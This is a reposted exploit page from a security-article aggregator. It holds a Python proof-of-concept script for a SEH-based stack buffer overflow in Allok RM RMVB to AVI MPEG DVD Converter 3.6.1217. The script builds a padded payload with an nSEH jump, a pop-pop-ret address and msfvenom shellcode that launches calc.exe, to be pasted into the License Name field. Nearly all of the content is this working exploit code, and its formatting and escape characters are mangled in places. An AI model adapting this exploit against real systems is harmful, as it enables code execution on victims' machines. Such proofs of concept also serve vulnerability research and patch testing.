HackDig : Dig high-quality web security articles for hackers

Allok RM RMVB To AVI MPEG DVD Converter 3.6.1217 Stack Overflow

2020-01-14 11:10
# Exploit Title: Allok RM RMVB to AVI MPEG DVD Converter 3.6.1217 - Stack Overflow (SEH)# Date: 2020-01-12# Exploit Author: Antonio de la Piedra# Vendor Homepage: https://www.alloksoft.com# Software Link: https://www.alloksoft.com/allok_rmconverter.exe# Version: 3.6.1217# Tested on: Windows 7 SP1 32-bit# Copy paste the contents of poc_seh.txt into the License Name input field# of  Allok RM RMVB to AVI MPEG DVD Converter 3.6.1217 to execute calc.exe.#!/usr/bin/pythonnseh_offset = 780total = 1000#  msfvenom -p windows/exec -b 'x00x0ax0d' -f python --var-name shellcode_calc CMD=calc.exe EXITFUNC=threadshellcode_calc =  b""shellcode_calc += b"xddxc0xbex48x33xfdx23xd9x74x24"shellcode_calc += b"xf4x5fx33xc9xb1x31x83xefxfcx31"shellcode_calc += b"x77x14x03x77x5cxd1x08xdfxb4x97"shellcode_calc += b"xf3x20x44xf8x7axc5x75x38x18x8d"shellcode_calc += b"x25x88x6axc3xc9x63x3exf0x5ax01"shellcode_calc += b"x97xf7xebxacxc1x36xecx9dx32x58"shellcode_calc += b"x6exdcx66xbax4fx2fx7bxbbx88x52"shellcode_calc += b"x76xe9x41x18x25x1exe6x54xf6x95"shellcode_calc += b"xb4x79x7ex49x0cx7bxafxdcx07x22"shellcode_calc += b"x6fxdexc4x5ex26xf8x09x5axf0x73"shellcode_calc += b"xf9x10x03x52x30xd8xa8x9bxfdx2b"shellcode_calc += b"xb0xdcx39xd4xc7x14x3ax69xd0xe2"shellcode_calc += b"x41xb5x55xf1xe1x3excdxddx10x92"shellcode_calc += b"x88x96x1ex5fxdexf1x02x5ex33x8a"shellcode_calc += b"x3exebxb2x5dxb7xafx90x79x9cx74"shellcode_calc += b"xb8xd8x78xdaxc5x3bx23x83x63x37"shellcode_calc += b"xc9xd0x19x1ax87x27xafx20xe5x28"shellcode_calc += b"xafx2ax59x41x9exa1x36x16x1fx60"shellcode_calc += b"x73xf8xfdxa1x89x91x5bx20x30xfc"shellcode_calc += b"x5bx9ex76xf9xdfx2bx06xfexc0x59"shellcode_calc += b"x03xbax46xb1x79xd3x22xb5x2exd4"shellcode_calc += b"x66xd6xb1x46xeax37x54xefx89x47"poc = ""poc += "A"*nseh_offsetpoc += "xEBx0bx90x90"   # jmp forward (nseh)poc +=  "x11x7bx03x10"  # pop pop ret (seh)poc += "x90"*20poc += shellcode_calcpoc += "D"*(total - len(poc))file = open("poc_seh.txt","w")file.write(poc)file.close()


Source: 9010100202-BLW/eussi/moc.ytirucesxc

Read:382 | Comments:0 | Tags:No Tag

“Allok RM RMVB To AVI MPEG DVD Converter 3.6.1217 Stack Overflow”0 Comments

Submit A Comment

Name:

Email:

Blog :

Verification Code:

Announce

Share high-quality web security related articles with you:)

Tools

Tag Cloud